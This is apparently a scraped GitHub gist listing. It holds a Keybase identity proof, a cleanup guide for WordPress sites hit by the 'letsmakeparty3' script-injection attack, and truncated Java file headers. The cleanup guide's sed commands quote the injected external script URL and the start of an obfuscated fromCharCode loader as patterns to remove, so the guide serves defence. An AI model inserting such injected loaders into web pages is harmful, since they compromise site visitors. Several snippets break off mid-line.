I hereby claim:
- I am fabmars on github.
- I am fabmars (https://keybase.io/fabmars) on keybase.
- I have a public key whose fingerprint is 8370 A975 1F13 15C4 163D 4981 D837 70C5 A506 DE84
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b | |
Here's how to restore the site's functionality (this does not plug the hole, wherever it is) | |
1) download all files via ftp under a *unix* system to preserve the file permissions as much as possible. I wouldn't do this from Windows, but if you're compelled to, at least download the files in binary mode to preserve line endings. | |
2) fix altered files | |
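# Strip the injected external <script> tag from every file under ./www.
# The sed expression is wrapped in double quotes so that the single quotes
# around the src URL stay part of the pattern. Inside a single-quoted
# expression the shell removes those inner quotes, so the pattern no longer
# matches a tag whose src attribute is quoted and the files are left infected.
# Run this on the downloaded copy and keep an untouched backup of the original.
find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g"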
find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.s |
package whatever.testing; | |
import com.fasterxml.jackson.databind.ObjectMapper; | |
import io.restassured.response.Response; | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.PrintStream; | |
import java.util.List; | |
import java.util.Map; | |
import java.util.Map.Entry; |
package whatever.converters; | |
import com.fasterxml.jackson.databind.ObjectMapper; | |
import java.io.BufferedWriter; | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.OutputStream; | |
import java.io.OutputStreamWriter; | |
import java.nio.charset.Charset; | |
import java.nio.charset.StandardCharsets; |